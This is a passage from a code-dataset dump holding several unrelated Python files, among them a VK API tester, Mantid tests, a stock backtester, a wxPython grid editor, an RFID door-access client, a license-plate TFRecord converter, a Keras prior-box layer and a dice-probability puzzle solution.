else:\n if (json.get('response') != None):\n \t if (json.get('error') != None):\n \t \tprint('Сервер вернул ошибку:')\n \t \tpprint.pprint(json['error'])\n \t else:\n \t \tprint('Неизвестная ошибка!');\n else:\n \t resp=json.get('response')\n \t print(resp)\n \n \n#JsonConsoleWriter(SendRequestVk(InputVkIds(),\"https://api.vk.com/method/users.get?user_ids={id}&fields=nickname,sex,city,site,first_name,last_name,status,online,last_seen&v=5.69\"))\nclass TestList:\n\n def test_type_error(self):\n with pytest.raises(URLError):\n SendRequestVk(\"id150534032\",\"https://jjr.jjr.jjr/method/users.get?user_ids={id}&fields=nickname,sex,city,site,first_name,last_name,status,online,last_seen&v=5.69\")\n def test_check1(self):\n aa=SendRequestVk(\"id150534032\",\"https://api.vk.com/method/users.get?user_ids={id}&fields=nickname,sex,city,site,first_name,last_name,status,online,last_seen&v=5.69\")\n assert (aa.get('response') != None)\n def test_check2(self):\n aa=SendRequestVk(\"asdasfdfdas\",\"https://api.vk.com/method/users.get?user_ids={id}&fields=nickname,sex,city,site,first_name,last_name,status,online,last_seen&v=5.69\")\n assert (aa.get('error') != None) \n \n\n \n","sub_path":"urllib.py","file_name":"urllib.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"246470582","text":"import unittest\n###############################################################################\n# This has to be tested through a workspace as it cannot be created in \n# Python\n###############################################################################\nfrom testhelpers import run_algorithm\nfrom mantid.geometry import Instrument\nfrom mantid.api import Sample, Run\n\nclass ExperimentInfoTest(unittest.TestCase):\n \n _expt_ws = None\n \n def setUp(self):\n if self.__class__._expt_ws is None:\n alg = run_algorithm('Load', Filename='LOQ48127.raw', SpectrumMax=1, child=True)\n self.__class__._expt_ws = alg.getProperty(\"OutputWorkspace\").value\n \n def test_information_access(self):\n inst = self._expt_ws.getInstrument()\n self.assertTrue(isinstance(inst, Instrument))\n self.assertEquals(self._expt_ws.getRunNumber(), 48127)\n \n def test_sample_access_returns_sample_object(self):\n sample = self._expt_ws.sample()\n self.assertTrue(isinstance(sample, Sample))\n \n def test_run_access_returns_run_object(self):\n run = self._expt_ws.run()\n self.assertTrue(isinstance(run, Run))","sub_path":"Code/Mantid/Framework/PythonInterface/test/python/mantid/api/ExperimentInfoTest.py","file_name":"ExperimentInfoTest.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"409348101","text":"###############################################################################\n#### Backtest\n###############################################################################\nimport pandas as pd\nimport numpy as np\nimport datetime\nfrom pytrade.io import adj_close_ipc\n\ndef pf_backtest(numdays, pf,start):\n ## Backtesting\n yday = datetime.datetime.today()-datetime.timedelta(days=1)\n base = yday-datetime.timedelta(days=numdays)\n\n test_dates = pd.bdate_range(base,yday)\n test_end = max(test_dates)\n test_start = min(test_dates)\n\n test_data = adj_close_ipc(start,test_end)\n\n\n rets = []\n metrics = []\n\n #test_dates = [d+datetime.timedelta(days=1) for d in test_dates]\n\n for date in test_dates:\n test = test_data[start:date-datetime.timedelta(days=1)]\n val = test_data[date:date]\n portfolio, mt = pf(test)\n\n metrics.append(mt)\n\n ret = 0.0\n\n for row in portfolio:\n try:\n previous_close = test[row[0]].tail()[-1]\n current_close = val[row[0]][0]\n temp = row[1]*np.log(current_close/previous_close)\n if np.isnan(temp):\n #print \"NaN here: \", row\n ret += 0.0\n else:\n ret += temp\n except:\n pass\n\n rets.append(ret)\n\n # Ba\n bt = test_data[test_start:test_end]\n market_rets = np.nansum(np.log(bt.values/bt.shift(1).values), axis = 1)\n\n\n test_dates = [pd.Timestamp(x) for x in test_dates]\n df = pd.DataFrame(index=test_dates)\n df['Strategy'] = rets\n df['Market'] = market_rets\n df['Portfolio Return'] = [m[0] for m in metrics]\n df['Portfolio Volatility'] = [m[1] for m in metrics]\n df['Sharpe Ratio'] = [m[2] for m in metrics]\n return df\n","sub_path":"pytrade/backtest.py","file_name":"backtest.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"538973449","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\lib\\GridEditor.py\n# Compiled at: 2019-04-19 01:10:52\nimport wx, wx.xrc, wx.grid as gridlib, wx.dataview, copy\n\nclass TableGrid(gridlib.Grid):\n\n def __init__(self, parent, log):\n gridlib.Grid.__init__(self, parent, -1)\n self.table = DataTable(log)\n self.SetTable(self.table, True)\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n self.Bind(gridlib.EVT_GRID_CELL_LEFT_DCLICK, self.OnLeftDClick)\n self.Bind(gridlib.EVT_GRID_CELL_LEFT_CLICK, self.OnLeftClick)\n self.SetColSize(0, 200)\n self.SetColSize(1, 100)\n self.SetColSize(2, 300)\n self.SetColSize(3, 100)\n self.selRow = 0\n self.selCol = 0\n self.log = log\n\n def OnLeftDClick(self, evt):\n if self.CanEnableCellControl():\n self.EnableCellEditControl()\n evt.Skip()\n\n def OnLeftClick(self, evt):\n self.selRow = evt.GetRow()\n self.selCol = evt.GetCol()\n evt.Skip()\n\n def SetChoice(self, col, lt):\n self.table.SetChoice(col, lt)\n\n def DelRow(self):\n self.table.DeleteRows(self.selRow, 1)\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n self.Update()\n return self.selRow\n\n def DelAll(self):\n self.table.DeleteAll()\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n self.Update()\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n\n def AddRow(self):\n self.table.AppendRows(1)\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n self.Update()\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n\n def AddRows(self, numRows):\n self.table.AppendRows(numRows)\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n self.Update()\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n\n def InsertRow(self, pos):\n self.table.InsertRows(pos, 1)\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n self.Update()\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n\n def Refresh(self):\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n self.Update()\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n\n def Render(self, data):\n self.DelAll()\n self.AddRows(len(data))\n for i in range(0, len(data)):\n for j in range(0, len(data[i])):\n self.table.SetValue(i, j, data[i][j])\n\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n self.Update()\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n\n\nclass DataTable(gridlib.GridTableBase):\n\n def __init__(self, log):\n gridlib.GridTableBase.__init__(self)\n self.log = log\n self.colLabels = [\n 'Name', 'Datatype', 'Comment', 'Init Value']\n self.dataTypes = [\n gridlib.GRID_VALUE_STRING,\n gridlib.GRID_VALUE_STRING,\n gridlib.GRID_VALUE_STRING,\n gridlib.GRID_VALUE_STRING]\n self.data = []\n self.itemdata = []\n self.defaultdata = [\n '', '', '', '']\n\n def GetNumberRows(self):\n return len(self.data)\n\n def GetNumberCols(self):\n return len(self.colLabels)\n\n def IsEmptyCell(self, row, col):\n try:\n return not self.data[row][col]\n except IndexError:\n return True\n\n def GetValue(self, row, col):\n try:\n return self.data[row][col]\n except IndexError:\n return ''\n\n def GetItemValue(self, row, col):\n try:\n return self.itemdata[row][col]\n except IndexError:\n return\n\n return\n\n def SetValue(self, row, col, value):\n\n def innerSetValue(row, col, value):\n try:\n self.data[row][col] = value\n except IndexError:\n self.data.append([''] * self.GetNumberCols())\n innerSetValue(row, col, value)\n msg = gridlib.GridTableMessage(self, gridlib.GRIDTABLE_NOTIFY_ROWS_APPENDED, 1)\n self.GetView().ProcessTableMessage(msg)\n\n innerSetValue(row, col, value)\n\n def SetItemValue(self, row, col, value):\n\n def innerSetItemValue(row, col, value):\n try:\n self.itemdata[row][col] = value\n except IndexError:\n self.data.append([''] * self.GetNumberCols())\n innerSetItemValue(row, col, value)\n msg = gridlib.GridTableMessage(self, gridlib.GRIDTABLE_NOTIFY_ROWS_APPENDED, 1)\n self.GetView().ProcessTableMessage(msg)\n\n innerSetItemValue(row, col, value)\n\n def SetChoice(self, col, lt):\n self.dataTypes[col] = gridlib.GRID_VALUE_CHOICE + ':' + (',').join(lt)\n\n def GetColLabelValue(self, col):\n return self.colLabels[col]\n\n def GetTypeName(self, row, col):\n return self.dataTypes[col]\n\n def CanGetValueAs(self, row, col, typeName):\n colType = self.dataTypes[col].split(':')[0]\n if typeName == colType:\n return True\n else:\n return False\n\n def CanSetValueAs(self, row, col, typeName):\n return self.CanGetValueAs(row, col, typeName)\n\n def DeleteRows(self, pos=0, numRows=1):\n if pos > len(self.data) and pos < 0:\n return\n for i in range(0, numRows):\n del self.data[pos + i]\n del self.itemdata[pos + i]\n\n msg = gridlib.GridTableMessage(self, gridlib.GRIDTABLE_NOTIFY_ROWS_DELETED, pos, numRows)\n self.GetView().ProcessTableMessage(msg)\n\n def DeleteAll(self):\n nn = self.GetNumberRows()\n msg = gridlib.GridTableMessage(self, gridlib.GRIDTABLE_NOTIFY_ROWS_DELETED, 0, self.GetNumberRows())\n self.GetView().ProcessTableMessage(msg)\n self.data = []\n self.itemdata = []\n\n def AppendRows(self, numRows=1):\n for i in range(0, numRows):\n dd = copy.deepcopy(self.defaultdata)\n self.data.append(dd)\n dd2 = [None] * len(self.defaultdata)\n self.itemdata.append(dd2)\n\n msg = gridlib.GridTableMessage(self, gridlib.GRIDTABLE_NOTIFY_ROWS_APPENDED, numRows)\n self.GetView().ProcessTableMessage(msg)\n return\n\n def InsertRows(self, pos, numRows=1):\n for i in range(0, numRows):\n dd = copy.deepcopy(self.defaultdata)\n self.data.insert(pos, dd)\n dd2 = [None] * len(self.defaultdata)\n self.itemdata.append(dd2)\n\n msg = gridlib.GridTableMessage(self, gridlib.GRIDTABLE_NOTIFY_ROWS_INSERTED, pos, numRows)\n self.GetView().ProcessTableMessage(msg)\n return","sub_path":"pycfiles/PLC_IDE-0.0.2-py2.7/GridEditor.py","file_name":"GridEditor.py","file_ext":"py","file_size_in_byte":7322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"209446188","text":"import requests\nimport json, string, datetime\nimport sys\nimport lcd_lib\nimport time\nfrom threading import Thread\nfrom http_lib import *\nfrom subprocess import check_output\nfrom log_writing import*\nconfig = {}\n\ndef get_ip():\n\treturn check_output(['hostname', '--all-ip-addresses'])\n\ndef configure(filename):\n\ttry:\n\t\twith open(filename) as f:\n\t\t\tdata = json.load(f)\n\t\tif (data.get(u'url_unlock') == None) or (data.get(u'url_upd') == None) :\n\t\t\traise Exception('Invalid content of config file')\n\texcept:\n\t\tlcd_lib.print_lcd('Configuration error')\n\t\tprint_log(\"Error processing config file: \" + str(sys.exc_info()))\n\t\tprint_log(\"Continuing working in an old way\")\n\telse:\n\t\tglobal config\n\t\tconfig = data\n\t\tlcd_lib.print_lcd('Configured')\n\t\tprint_log(\"New configuration: \" + str(config)) \n\ndef allowed_by_server(uid):\n\ttry:\n\t\tglobal config, ser1, ser2, ser3\n\t\turl = config[u'url_unlock'] + uid\n\t\tr = requests.get(url)\n\t\tprint_log('Unlock request:' + str(url))\n\t\tprint_log('response status code: ' + str(r.status_code))\n\t\tprint_log(r.text)\n\n\t\tif r.status_code != 200:\n\t\t\traise Exception('Server error')\n\t\tif (r.text == 'yes'):\n\t\t\treturn (True, \"not_defined\")\n\t\tif (r.text == \"no\") :\n\t\t\treturn (False, \"not_defined\")\n\n\t\tresp = json.loads(r.text)\n\t\tprint_log(\"name: \" + resp[\"name\"])\n\t\tif resp[\"status\"] == \"yes\":\n\t\t\treturn (True, resp[\"cause\"])\n\t\telse:\n\t\t\treturn (False, resp[\"cause\"])\n\n\texcept:\n\t\tlcd_lib.print_lcd('Network error')\n\t\tprint_log(\"Error asking server to unlock: \" + str(sys.exc_info()))\n\t\tprint_log(\"Continuing working\")\n\treturn (False, \"error\")\n\ndef allowed_by_list(uid):\n\tprint_log(\"Asking list\")\n\ttry:\n\t\twith open('access_list.txt') as f:\n\t\t\tdata = json.load(f, object_hook=date_hook)\n\n\t\tfor o in data:\n\t\t\tif (o['uid'] == uid)\\\n\t\t\tand (o['date_start'].date() == datetime.date.today())\\\n\t\t\tand (o['time_start'].time() <= datetime.datetime.now().time())\\\n\t\t\tand (o['time_end'].time() >= datetime.datetime.now().time()):\n\t\t\t\tprint_log(\"access granted\")\n\t\t\t\tprint_log(\"name: \" + o[\"name\"])\n\t\t\t\treturn True\n\texcept:\n\t\tlcd_lib.print_lcd('Database error')\n\t\tprint_log(\"Error processing access list: \" + str(sys.exc_info()))\n\t\tupdate_list()\n\tprint_log(\"no access\")\n\treturn False\n\ndef allowed_by_admin(uid):\n\ttry:\n\t\twith open('admin_uid.txt', 'rb') as f:\n\t\t\tfor line in f:\n\t\t\t\tif uid == line[:-1]:\n\t\t\t\t\tprint_log(\"Welcome, Admin Adminovich\")\n\t\t\t\t\treturn True\n\texcept:\n\t\tlcd_lib.print_lcd('Local error')\n\t\tprint_log(\"Error processing admin list\" + str( sys.exc_info()))\n\treturn False\n\ndef read_one_time_set():\n\tprint_log(\"reading one time set\")\n\ttry:\n\t\tf = open(\"one_time_set\", \"rb\")\n\t\tres = set(json.load(f))\n\t\tf.close()\n\t\tprint_log(\"reading ok\")\n\t\treturn res\n\texcept:\n\t\tprint_log(\"one time set reading falure \" + str(sys.exc_info()))\n\t\treturn set()\n\ndef write_one_time_set(set):\n\tprint_log(\"writing one time set\")\n\ttry:\n\t\tf = open(\"one_time_set\", \"wb\")\n\t\tjson.dump(list(set), f)\n\t\tprint_log(\"writing ok\")\n\texcept:\n\t\tprint_log(\"writing failed \" + str(sys.exc_info()))\n\n\ndef allowed_to_unlock(uid):\n\tif uid in lst: return (True, \"because\")\n\tif allowed_by_admin(uid):\n\t\treturn (True, \"admin\")\n\n\tone_time_set = read_one_time_set()\n\n\tif allowed_by_list(uid):\n\t\tif not uid in one_time_set:\n\t\t\tone_time_set.add(uid)\n\t\t\twrite_one_time_set(one_time_set)\n\t\treturn (True, \"list\")\n\n\tstatus, cause = allowed_by_server(uid)\n\tif status:\n\t\tif not uid in one_time_set:\n\t\t\tone_time_set.add(uid)\n\t\t\twrite_one_time_set(one_time_set)\n\t\treturn (True, cause)\n\n\tif uid in one_time_set:\n\t\tone_time_set.remove(uid)\n\t\twrite_one_time_set(one_time_set)\n\t\treturn (True, \"last_time\")\n\n\treturn (False, cause)\n\ndef date_hook(json_dict):\n\tfor (key, value) in json_dict.items():\n\t\ttry:\n\t\t\tjson_dict[key] = datetime.datetime.strptime(value, \"%Y-%m-%d\")\n\t\texcept:\n\t\t\tpass\n\t\ttry:\n\t\t\tjson_dict[key] = datetime.datetime.strptime(value, \"%H:%M\")\n\t\texcept:\n\t\t\tpass\n\treturn json_dict\n\ndef update_list():\n\ttry:\n\t\tglobal config\n\t\turl = config[u'url_upd']\n\t\tr = requests.get(url)\n\t\tprint_log('Update request:' + url)\n\t\tprint_log('response status code: ' + str(r.status_code))\n\t\tif r.status_code != 200:\n\t\t\traise Exception('Server error')\n\t\tjson_str = string.replace(r.text, \"'\", '\"')\n\t\twith open('access_list.txt', 'w') as f:\n\t\t\tf.write(json_str)\n\t\tprint_log(\"Access list successfully updated\")\n\t\tdata = json.loads(json_str, object_hook=date_hook)\n\t\treturn data\n\texcept:\n\t\tlcd_lib.print_lcd('Network error')\n\t\tprint_log(\"Error asking server to update: \" + str(sys.exc_info()))\n\t\tprint_log(\"Continuing working\")\n\treturn None\n\n\nclass update_thread(Thread):\n\tdef __init__(self):\n\t\tThread.__init__(self)\n\t\tself.name = \"list update thread\"\n\n\tdef run(self):\n\t\tconfigure(\"config.txt\")\n\t\twhile 1:\n\t\t\tprint_log(\">->->->->LIST UPDATE EVENT<-<-<-<-<\")\n\t\t\tupdate_list()\n\t\t\tprint_log(\"<-<-<-<-->->->->\\n\")\n\t\t\ttime.sleep(15 * 60)\n\nupdate_thr = update_thread()\n\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"212518493","text":"import argparse\nfrom pathlib import Path\nfrom PIL import Image\nimport tensorflow as tf\nimport io\nimport numpy as np\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--data\",\n default=None,\n type=str,\n required=True,\n help=\"The input data dir. Should contain all the images\")\n\nparser.add_argument(\"--output_dir\",\n default=None,\n type=str,\n required=True,\n help=\"The output dir for resized images\")\n\nargs = parser.parse_args()\n\nIMAGE_DIR = Path(args.data)\nINPUT_SIZE_H = 320\nINPUT_SIZE_W = 320\n\nOUTPUT_DIR = Path(args.output_dir)\nif not OUTPUT_DIR.exists():\n OUTPUT_DIR.mkdir()\n\n\ndef int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\ndef int64_list_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=value))\n\n\ndef bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef bytes_list_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))\n\n\ndef float_feature(value):\n return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))\n\n\ndef float_list_feature(value):\n return tf.train.Feature(float_list=tf.train.FloatList(value=value))\n\n\ndef spilt_train_val(image_names, val_ratio=0.15):\n np.random.shuffle(image_names)\n train_keys, validation_keys = (\n image_names[int(len(image_names) * val_ratio):],\n image_names[: int(len(image_names) * val_ratio)],\n )\n return train_keys, validation_keys\n\n\ndef create_tf_example(info):\n tf_example = tf.train.Example(features=tf.train.Features(feature={\n 'image/height': int64_feature(info[\"height\"]),\n 'image/width': int64_feature(info[\"width\"]),\n 'image/filename': bytes_feature(info[\"filename\"]),\n 'image/source_id': bytes_feature(info[\"source_id\"]),\n 'image/encoded': bytes_feature(info[\"encoded\"]),\n 'image/format': bytes_feature(info[\"format\"]),\n 'image/object/bbox/xmin': float_list_feature(info[\"xmin\"]),\n 'image/object/bbox/xmax': float_list_feature(info[\"xmax\"]),\n 'image/object/bbox/ymin': float_list_feature(info[\"ymin\"]),\n 'image/object/bbox/ymax': float_list_feature(info[\"ymax\"]),\n 'image/object/class/text': bytes_list_feature(info[\"text\"]),\n 'image/object/class/label': int64_list_feature(info[\"label\"]),\n }))\n return tf_example\n\n# 获取 bounding-box 信息\n# 输入:image path\n# 返回:\n# bounding box\n\n\ndef get_bounding_box(image_name, xratio=1, yratio=1):\n kp = []\n kp_serial = image_name.split('-')[3].split('_')\n\n for i in range(0, 4):\n tmp = kp_serial[i].split('&')\n kp.append(int(tmp[0]))\n kp.append(int(tmp[1]))\n\n # 左上角点\n tlx = min(kp[2], kp[4]) * xratio\n tly = min(kp[5], kp[7]) * yratio\n\n # 右下角点\n brx = max(kp[0], kp[6]) * xratio\n bry = max(kp[1], kp[3]) * yratio\n\n return (tlx, tly, brx, bry)\n\n\ndef write_tf_record(writer, img_files):\n\n for img_file in img_files:\n image = Image.open(img_file).crop(\n (0, 0, 720, 720)).resize((INPUT_SIZE_W, INPUT_SIZE_H))\n # 获取boundingbox的左上角、右下角\n xratio = INPUT_SIZE_W / 720.0\n yratio = INPUT_SIZE_H / 720.0\n\n with io.BytesIO() as output:\n image.save(output, format=\"JPEG\")\n encoded_jpg = output.getvalue()\n\n bounding_box = get_bounding_box(img_file.name, xratio, yratio)\n\n if (bounding_box[0] > INPUT_SIZE_W or bounding_box[1] > INPUT_SIZE_H or bounding_box[2] > INPUT_SIZE_W or bounding_box[3] > INPUT_SIZE_H):\n continue\n\n # 图片信息\n info = {\n 'height': image.height,\n 'width': image.width,\n 'filename': img_file.name.encode('utf8'),\n 'source_id': img_file.name.encode('utf8'),\n 'encoded': encoded_jpg,\n 'format': b'jpg',\n 'xmin': [bounding_box[0] / image.width],\n 'xmax': [bounding_box[2] / image.width],\n 'ymin': [bounding_box[1] / image.height],\n 'ymax': [bounding_box[3] / image.height],\n 'text': [b'plate'],\n 'label': [1],\n }\n\n example = create_tf_example(info)\n writer.write(example.SerializeToString())\n\n\ndef main():\n\n # 加载图片信息\n img_files = [f for f in IMAGE_DIR.iterdir()]\n img_files.sort(key=lambda f: f.stem, reverse=True) # 排序,防止顺序错乱、数据和标签不对应\n train_files, val_files = spilt_train_val(img_files)\n\n with tf.io.TFRecordWriter(str(OUTPUT_DIR.joinpath(\"train.tfrecord\"))) as writer:\n write_tf_record(writer, train_files)\n\n with tf.io.TFRecordWriter(str(OUTPUT_DIR.joinpath(\"val.tfrecord\"))) as writer:\n write_tf_record(writer, val_files)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ccpd_to_tfrecord.py","file_name":"ccpd_to_tfrecord.py","file_ext":"py","file_size_in_byte":4975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"90610894","text":"# -*- coding:utf-8 -*-\nimport re\n\n\ndef ignoreWS(str):\n\t\"\"\"将str左右的空白字符去掉\"\"\"\n\tresult = re.match(r'^[ \\t\\n\\r]*(.*?)[ \\t\\n\\r]*$', str)\n\tretV = result.group(1) if result else \"\"\n\treturn retV\n\n\ndef list2str(ls, ls_type=\"conditions\"):\n\tstring = \"\"\n\tif not isinstance(ls, list):\n\t\treturn str(ls)\n\tif ls_type == \"conditions\":\n\t\tfor idx, ele in enumerate(ls):\n\t\t\tls[idx] = list2str(ele, ls_type)\n\t\tstring = \"[\" + \",\".join(ls) + \"]\"\n\treturn string\n\n\ndef str2list(string=\"\", content_type=\"tree\"):\n\t\"\"\"\n\t将str形式的list转成list。\n\n\t:param string: str 形式的list\n\t:param content_type: list内容,现有 tree, int,conditions\n\t:return: list\n\t\"\"\"\n\n\tstring = string.decode(\"utf-8\") if isinstance(string, str) else string\n\n\tif string[0] != \"[\" or string[-1] != \"]\":\n\t\treturn string\n\tif len(string) == 2:\n\t\treturn []\n\tif content_type == \"tree\":\n\t\tls = []\n\t\tstart_idx = 0\n\t\tcur_idx = 0\n\t\tcount = 0\n\t\tstr_len = len(string) - 1\n\t\twhile True:\n\t\t\tl_bracket_idx = string.find(\"(\", cur_idx)\n\t\t\tr_bracket_idx = string.find(\")\", cur_idx)\n\t\t\tif l_bracket_idx == -1:\n\t\t\t\t# 从cur_idx 到最后都是一个tree\n\t\t\t\tls.append(string[start_idx+1: -1])\n\t\t\t\tbreak\n\t\t\telif l_bracket_idx < r_bracket_idx:\n\t\t\t\tcount += 1\n\t\t\t\tcur_idx = l_bracket_idx+1\n\t\t\telif r_bracket_idx == -1:\n\t\t\t\traise IndexError\n\t\t\telse:\n\t\t\t\tcount -= 1\n\t\t\t\tcur_idx = r_bracket_idx + 1\n\t\t\t\tif count == 0:\n\t\t\t\t\tls.append(string[start_idx + 1: r_bracket_idx+1])\n\t\t\t\t\tstart_idx = cur_idx = r_bracket_idx + 1\n\t\t\t\t\tif start_idx >= str_len:\n\t\t\t\t\t\tbreak\n\telse:\n\t\t# 格式化list中各项\n\t\tif content_type == \"int\":\n\t\t\tls = string[1:-1].split(\",\")\n\t\t\tfor idx, ele in enumerate(ls):\n\t\t\t\tls[idx] = int(ele)\n\t\telif content_type == \"conditions\":\n\t\t\t# string like:'[[TRUE,TRUE,TRUE],[IS_GT,age,12]]'\n\t\t\tls = string[:-1].split(\"]\")\n\t\t\t# ls like: ['[TRUE,TRUE,TRUE','[IS_GT,age,12']\n\t\t\tfor idx, ele in enumerate(ls):\n\t\t\t\tif ele != \"\":\n\t\t\t\t\tls[idx] = ele[2:].split(\",\")\n\t\t\t\telse:\n\t\t\t\t\tls.pop(idx)\n\treturn ls\n","sub_path":"Utils_string.py","file_name":"Utils_string.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"518619273","text":"import keras.backend as K\nimport tensorflow as tf\nimport numpy as np\nimport keras\n\nclass PriorBox(keras.layers.Layer):\n def __init__(self, image_size, min_size, aspect_ratio, max_size=None,\n flip=True, clip=True, variances=[0.1], **kwargs):\n self.image_size = image_size\n self.min_size = min_size\n self.max_size = max_size\n self.clip = clip\n self.flip = flip\n if(len(variances) == 1):\n self.variances = variances * 4\n elif(len(variances) == 4):\n self.variances = variances\n else:\n self.variances = [0.1, 0.1, 0.2, 0.2]\n\n self.wi, self.hi = 2, 1\n self.aspect_ratio = [1.0]\n if max_size:\n self.aspect_ratio.append(1.0)\n if aspect_ratio:\n for ar in aspect_ratio:\n if ar in self.aspect_ratio:\n continue\n self.aspect_ratio.append(ar)\n if flip:\n self.aspect_ratio.append(1.0 / ar)\n\n box_width, box_height = [], []\n for ar in self.aspect_ratio:\n if ar == 1 and len(box_width) == 0:\n box_width.append(self.min_size)\n box_height.append(self.min_size)\n elif ar == 1 and len(box_width) > 0:\n box_width.append(np.sqrt(self.min_size * self.max_size))\n box_height.append(np.sqrt(self.min_size * self.max_size))\n elif ar != 1:\n box_width.append(self.min_size * np.sqrt(ar))\n box_height.append(self.min_size / np.sqrt(ar))\n self.box_width = 0.5 * np.array(box_width)\n self.box_height = 0.5 * np.array(box_height)\n\n super(PriorBox, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n num_p = len(self.aspect_ratio)\n width = input_shape[self.wi]\n height = input_shape[self.hi]\n num_boxes = num_p * width * height\n return input_shape[0], num_boxes, 8\n\n def call(self, input, **kwargs):\n\n # input_shape = K.int_shape(input)\n input_shape = input._keras_shape\n layer_width, layer_height = input_shape[self.wi], input_shape[self.hi]\n img_width, img_height = self.image_size[0], self.image_size[1]\n\n box_width = img_width / layer_width\n box_height = img_height / layer_height\n cbw, cbh = box_width / 2, box_height / 2\n linx = np.linspace(cbw, img_width - cbw, layer_width)\n liny = np.linspace(cbh, img_height - cbh, layer_height)\n origin = np.zeros(shape=(layer_width * layer_height * len(self.aspect_ratio), 8))\n\n p = 0\n for xi in range(linx.shape[0]):\n for yi in range(liny.shape[0]):\n for i in range(len(self.aspect_ratio)):\n center_x, center_y = linx[xi], liny[yi]\n bw, bh = self.box_width[i], self.box_height[i]\n xmin, ymin = center_x - bw, center_y - bh\n xmax, ymax = center_x + bw, center_y + bh\n xmin, xmax = xmin / img_width, xmax / img_width\n ymin, ymax = ymin / img_height, ymax / img_height\n origin[p] = xmin, ymin, xmax, ymax, \\\n self.variances[0], self.variances[1], self.variances[2], self.variances[3]\n p += 1\n\n if self.clip:\n origin = np.minimum(np.maximum(origin, 0.0), 1.0)\n origin = K.expand_dims(K.variable(origin), 0)\n pattern = [tf.shape(input)[0], 1, 1]\n tensor = tf.tile(origin, pattern)\n return tensor\n\n","sub_path":"src/Layers/PriorBox.py","file_name":"PriorBox.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"372135960","text":"import math\n\ndef fact(n):\n result = 1\n for i in range(1,n+1):\n result *= i\n return result\n\ndef combination(n,r):\n return fact(n)/(fact(n-r) * fact(r))\n\ndef comb(n,r):\n digit = n\n numerator = 1\n for _ in range(r):\n numerator *= digit\n digit -= 1\n denominator = fact(r)\n return numerator//denominator\ndef hackercup():\n T = int(input())\n for i in range(T):\n H, S = input().split(\" \")\n H = int(H)\n spells = input().split(\" \")\n probabilities = []\n for spell in spells:\n add = False\n if '+' in spell:\n add = True\n spell = spell.split(\"+\")\n else:\n spell = spell.split(\"-\")\n spell = spell[0].split(\"d\") + spell\n spell.pop(2)\n if len(spell) == 2:\n spell.append(0)\n for j in range(len(spell)):\n spell[j] = int(spell[j])\n if not add:\n spell[2] = -1 * spell[2]\n minimum_possible = 1 * spell[0] + spell[2]\n total_ways = math.pow(spell[1], spell[0])\n coeffs = expandPoly(spell[0], spell[1])\n res = 0\n if H-minimum_possible >=0:\n for j in coeffs[H-minimum_possible:]:\n res += j\n probabilities.append(getProbability(res, total_ways))\n print(\"Case #\" + str(i+1) + \": \" + str(format(round(sorted(probabilities)[-1], 6), \".6f\")))\n\n\ndef getProbability(num_of_success_ways, total_ways):\n return num_of_success_ways/int(total_ways)\n\n\ndef getCoeff(n, k, no_of_sides):\n\n if(k/no_of_sides >= 1):\n coefficient = 0\n for j in range(int(k/no_of_sides)+1):\n coefficient += (int(math.pow(-1, j)) * comb(n, j) * comb((n+k-1)-(no_of_sides*j), n-1))\n else:\n j = 0\n coefficient = (int(math.pow(-1, j)) * comb(n, j) * comb((n + k - 1) - (no_of_sides * j), n - 1))\n return coefficient\n\ndef expandPoly(dieRollCount, noOfSides):\n coefficients = []\n noOfCoefficients = (dieRollCount*(noOfSides - 1))+1\n coefficients.append(1)\n for i in range(1, noOfCoefficients):\n coefficients.append(int(getCoeff(dieRollCount, i, noOfSides)))\n return coefficients\n\nif __name__ == '__main__':\n hackercup()","sub_path":"Facebook 